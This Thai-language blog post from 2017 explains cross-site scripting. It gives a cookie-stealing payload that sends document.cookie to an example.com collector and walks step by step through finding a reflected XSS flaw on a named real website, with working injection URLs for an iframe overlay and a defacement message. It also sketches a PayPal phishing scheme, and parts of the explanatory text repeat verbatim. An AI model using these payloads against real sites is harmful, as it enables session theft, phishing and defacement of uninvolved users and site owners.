• September 4, 2017

    (XSS (cross site scripting) เป็นวิธีการยอดนิยมที่แฮคเกอร์รู้จักกันดี ซี่งเป็นเทคนิคการฝังโค้ดเข้าไปกับหน้าเวปเพจที่มีช่องโหว่ เมื่อผู้ใช้โหลดหน้าเวปเพจไป ค่าที่สำคัญบางอย่าง เช่น ค่าของ cookie, username, password ,… ก็อาจจะถูกขโมยไปได้

    มาดูตัวอย่างการฝังโค้ดกัน

    <img src=’javascript:alert(“HACKED BY ITU”); document.location = “http://www.example.com/cookie.php?cookie=”+document.cookie;’ />

    จะเห็นได้ว่า เมื่อผู้ใช้โหลดรูปขึ้นมา ก็จะมี alert ขึ้นมาว่า “HACKED BY ITU” ต่อจากนั้นก็จะเปลี่ยนหน้าเวปเพจไปที่ http://www.example.com/cookie.php พร้อมกับ cookie ของคุณ นั้นหมายความว่า คุณได้โดนขโมย cookie ไปแล้วนั่นเอง…

    วิธีป้องกัน อาจจะไม่ได้ผล 100% แต่ก็สามารถช่วยได้ไม่น้อยทีเดียว
    นั่นคือการ Disable Scripting Language ที่ Web Browser
    ถ้าใครใช้ firefox ก็โหลด Extension ที่มีชือว่า NoScripts มาลองใช้ดูก็ได้

    ในเว็บไซต์ที่ต้องมีการใช้ข้อมูลส่วนตัวของผู้เยี่ยมชมในการเข้า ถึง และไม่มีการตรวจสอบข้อมูล และเมื่อพวกเขากลับเข้ามาเยี่ยมชมซ้ำอีกครั้งในภายหลัง แฮคเกอร์จะแอบสร้างลิงค์ขึ้นมาใหม่บนเว็บไซต์เป้าหมายด้วยโค้ด หรือสคริปท์โดยอาศัยช่องโหว่ของระบบรักษาความปลอดภัยของเว็บไซต์นั้น แล้วแอบขโมยเอาข้อมูลที่ผู้ใช้กรอกเข้าไปโดยที่ผู้ใช้เข้าใจว่า ได้ให้ข้อมูลสำคัญกับทางเว็บไซต์ที่กำลังติดต่ออยู่ในขณะนั้น การโจมตีด้วยเทคนิค Cross Site Scripting แฮคเกอร์สามารถสร้าง และส่งลิงค์ไปให้กับเหยื่อ (ด้วยชื่อของเว็บไซต์ที่มีช่องโหว่ และต้องมีการป้อนข้อมูลเพื่อเป็นสมาชิก) ผ่านทางอีเมล์, เว็บบอร์ด เป็นต้น เมื่อแฮคเกอร์ได้ข้อมูลของคุณไปแล้ว พวกมันก็จะสวมรอยด้วยการใช้ข้อมูลของคุณล็อกออนเข้าไปยังเว็บไซต์ต่างๆ ได้
    สังเกตุหน้าเว็บนี้จะประกอบด้วยข้อมูลจากเซิร์ฟเวอร์ MyBank กับแบบฟอร์มของแฮคเกอร์
    กล่าวโดยสรุปก็คือ Cross Site Scripting เป็นเทคนิคการส่งลิงค์ที่ฝังโค้ด หรือสคริปท์การทำงานของแฮคเกอร์เข้าไป เพื่อให้ปรากฎบนหน้าเว็บของเว็บไซต์ที่มีช่องโหว่ โดยหลอกให้ผู้ใช้กรอกข้อมูลสำคัญแล้วส่งกลับมาให้แฮคเกอร์แทนที่จะผ่านเข้า ไปในเว็บไซต์ที่เรากำลังเข้าไปเยี่ยมชมอยู่ในขณะนั้นนั่นเอง

    เริ่มจาก การ xss หรือ Cross-site scripting
    (ผมรู้ว่าหลายคนไม่เข้าใจว่าไอ้ Cross-site scripting คืออะไร  แปลว่าอะไร มาจากไหน ไว้ทำอะไร)
    ไอ้การอธิบายอะไร ยาวๆ เป็นน้ำๆ ผมไม่ค่อยสันทัดซะด้วย ดังนั้นถ้าอยากรู้น้ำๆ ไปอ่านจาก wiki เอาคับ

    เอาล่ะ เข้าเนื้อเลยดีกว่า ..
    ไอ้การ xss เนี้ย ผมว่ามันง่ายสุด ในการหาเลยนะ
    ประมาณ 60 – 70% ของเวป ที่มีการเรียกค่า จากการ input ทั้งหลาย นี่แทบจะมีบัคนี้ทั้งนั้น
    (เอ๊า แล้ว input คืออะไร ล่ะ … เออ นั่นจิ สรุปประมาณว่า เวปที่มีการกรอกค่า ทางเวป site แล้วกัน)

    ความรู้ที่ต้องมี
    – พอรู้ html งูๆปลาๆ (พวก แต่งเวป hi5 เป็นนี่ แทบจะคล่องเลยด้วยซ้ำ)
    – รู้คำสั่ง javascript ที่จำเป็น (เข้าทางพวก hi5 อีกแล้ว !!)
    – รู้ php , asp ,  หน่อยๆ พวกการ comment อะไรทำนองนี้
    – สำนึกดี (เพื่อศึกษาและสอนผู้อื่น มิใช้ เพื่อประโยชน์ส่วนตัว)

    ความอันตรายของการ hack แบบนี้
    – ต่ำ ถึง ปานกลาง
    ประมาณว่าเป็นการจำอวด ว่า เฮ้ย hack ได้ นะเว้ย แต่ จริงๆแล้ว ทำอะไรตัว host ไม่ได้หรอก
    มันเป็นการ สั่งให้ code ไป run บน เครื่อง client (เครื่องคนเปิดเวป) แล้ว script ที่ฝังอยู่บนเวป
    ก็จะไป รัน บน client ทีนี้ก็สามารถ ประยุคใช้ ขโมย cookie ของ user ได้ แล้วถ้าฟรุ๊กได้ user ระดับ admin อาจจะ
    อันตรายเพิ่มขึ้นเหมือนตอนที่ผม hack บ้านไอ้น๊อตแล้ว login เป็นมันไป โพส comment
    ซึ่ง สมมุติ ถ้าผม ไปใช้วิธีนี้ hack เจ้าของ multiply ล่ะแล้วหลังจากนั้นก็ … ตามแต่จะจิตนาการ
    แต่ ถ้า โปรกว่านั้น เคยเห็น javascript ประกอบร่างโทรจันของจีนมั้ย เอ่ย ^^”
    ประมาณว่า แค่เปิดเวปก็ติดโทรจันแล้ว อ่ะ แนวๆ นั้นเลย

    เอาล่ะทีนี้เรามายกตัวอย่าง ไกลๆ ตัวหน่อย (แค่เขียนนี่ก็ก้าวเข้าคุกไปครึ่งก้าวแล้วมั้งตู)
    เหยื่อ เราคือ http://www.stanica.sk/main.php
    หลักๆ ในการหา xss ก็คือ
    1. เปิดเวป
    2. view src
    3. เดา !! (แบบมีหลักการ)

    เอาล่ะ แล้วหลักการคืออะไร ?
    ผมว่ามันไม่มีตายตัว .. แต่อย่างที่บอก หาจุด input รูไหนที่ใส่ค่าได้ ต้องหามาลองให้หมด !!

    พอเปิด view src มาปุ๊ป มองไปไม่ไกล … ผมก็เจอ <a href=”main.php?page=STANICA&lang=SK”>
    เอ๋ ว่าแต่ มันพิเศษยังไงน่ะรึ บอกแล้วว่าต้องมั่ว … เริ่มจากลอง ใส่ url เป็น

    http://www.stanica.sk/main.php?page=STANICA&lang=SK

    ค่าที่ น่าจะรับเข้าไปคือ STANICA และ SK
    อ๊ะ มันก็ไม่แปลกอะไรจริงมั้ย ??

    เอาล่ะ ทีนี้ลอง มั่วใหม่เป็น
    http://www.stanica.sk/main.php?page=STANICA&lang=มั่วนี่หว่า

    เป็นไง ทางซ้าย หายเรียบ
    แบบนี้ เข้าทางโจร ซะแระ ลอง view src ใหม่อีกที (เลือก ภาษาไทย นะ … ไม่งั้น ส่วนที่เป็นภาษาไทยจะเจอ ภาษาต่างดาวแทน)
    จะเห็นว่าเกิดการเปลี่ยนแปลง ใน src ของ page
    จาก
    <a href=”main.php?page=STANICA&lang=SK”>
    กลายเป็น
    <a href=”main.php?page=STANICA&lang=มั่วนี่หว่า”>

    แล่ว ๆ ๆ ๆ ๆ

    ทีนี้ ถ้าเรา เปลี่ยนจาก (มั่วนี่หว่า) เป็น (“</a>code html here”) ล่ะ
    ตามที่คิด ใน src มันก็น่าจะกลายเป็น
    <a href=”main.php?page=STANICA&lang=”</a>code html here””>

    อ่า คิดเสร็จแล้วก็ลอง เลยแล้วกัน
    http://www.stanica.sk/main.php?page=STANICA&lang=%22%3C/a%3Ecode%20html%20here%22

    เป็นไงล่ะ ด้านซ้าย กลายเป็น code html here ตรึมเลย
    ทีนี้ ก็เหมือนกับว่าเราเขียน อะไร ลง บน link ก็จะขึ้นที่เวปหมดเลย
    ทีนี้ ลองจิตนาการว่า

    สมมุติว่ามีคนเจอ xss ของเวป ธนาคารแห่งหนึ่ง
    … ไม่ๆ ๆ เอาเป็น เจอ xss ของ paypal แล้วกัน ใกล้ตัวดี
    มี hacker คนหนึ่ง เขียน code เป็นหน้า login ของ paypal ไปไว้ที่ host free
    หน้าตาเวปจะเป็น เวป แนวๆ pushing หน้าตา เหมือน paypal เปรี๊ยบ
    แต่เขียนให้เก็บค่า จาก form login (หน้าปลอม) เก็บไว้ให้ตัว hacker เองกลับมาอ่าน
    จากนั้นก็เขียน code ต่อท้าย ให้ redirect กลับ ไป paypay ของจริง

    จากนั้น เอา code iframe มา ต่อท้ายเวป paypal จริง ล่ะ

    ผลก็คือทุก user ที่ login ไป แทนที่จะเข้า paypal กลายเป็นไปเข้า เวป ของ hacker ซะแทน

    คิดซะว่า คล้ายๆ หน้านี้แล้วกัน
    –> http://www.stanica.sk/main.php?page=STANICA&lang=”</a></p></td></tr><IFRAME src =http://multiply.com width=100% height=100%></IFRAME>//
    แต่ถ้าทำจริงๆ จะเนียล กว่านี้เยอะ *-*

    หรือจะเป็นแบบ อวดๆ ก็
    http://www.stanica.sk/main.php?page=PROGRAM&lang=%22%3C/a%3E%3Cspan%20style=%20font-size:10em%3E%3Cblink%3Ehacked%20by%20windows98SE%3C/blink%3E%3C/span%3E#

    Cross Site Scripting (XSS) ซึ่งคำนี้แฮคเกอร์ส่วนใหญ่จะเข้าใจดี เพราะมันเป็นเทคนิคที่ใช้ในการจับตาดูเว็บไซต์ต่างๆ ที่มีช่องโหว่ของระบบรักษาความปลอดภัย

    โดยเฉพาะเว็บไซต์ที่ต้องมีการใช้ข้อมูลส่วนตัวของผู้เยี่ยมชมในการเข้าถึง และไม่มีการตรวจสอบข้อมูล เมื่อพวกเขากลับเข้ามาเยี่ยมชมซ้ำอีกครั้งในภายหลัง แฮคเกอร์จะแอบสร้างลิงค์ขึ้นมาใหม่บนเว็บไซต์เป้าหมายด้วยโค้ด หรือสคริปท์โดยอาศัยช่องโหว่ของระบบรักษาความปลอดภัยของเว็บไซต์นั้น แล้วแอบขโมยเอาข้อมูลที่ผู้ใช้กรอกเข้าไปโดยที่ผู้ใช้เข้าใจว่า ได้ให้ข้อมูลสำคัญกับทางเว็บไซต์ที่กำลังติดต่ออยู่ในขณะนั้น การโจมตีด้วยเทคนิค Cross Site Scripting แฮคเกอร์สามารถสร้าง และส่งลิงค์ไปให้กับเหยื่อ (ด้วยชื่อของเว็บไซต์ที่มีช่องโหว่ และต้องมีการป้อนข้อมูลเพื่อเป็นสมาชิก) ผ่านทางอีเมล์, เว็บบอร์ด เป็นต้น เมื่อแฮคเกอร์ได้ข้อมูลของคุณไปแล้ว พวกมันก็จะสวมรอยด้วยการใช้ข้อมูลของคุณล็อกออนเข้าไปยังเว็บไซต์ต่างๆ ได้

    สังเกตุหน้าเว็บนี้จะประกอบด้วยข้อมูลจากเซิร์ฟเวอร์ MyBank กับแบบฟอร์มของแฮคเกอร์
    กล่าวโดยสรุปก็คือ Cross Site Scripting เป็นเทคนิคการส่งลิงค์ที่ฝังโค้ด หรือสคริปท์การทำงานของแฮคเกอร์เข้าไป เพื่อให้ปรากฎบนหน้าเว็บของเว็บไซต์ที่มีช่องโหว่ โดยหลอกให้ผู้ใช้กรอกข้อมูลสำคัญแล้วส่งกลับมาให้แฮคเกอร์แทนที่จะผ่านเข้าไปในเว็บไซต์ที่เรากำลังเข้าไปเยี่ยมชมอยู่ในขณะนั้นนั่นเอง

    อ่านเพิ่มที่ http://www.yannarak.com/node/2



เวอไนน์ไอคอร์ส

ประหยัดเวลากว่า 100 เท่า!






เวอไนน์เว็บไซต์⚡️
สร้างเว็บไซต์ ดูแลเว็บไซต์

Categories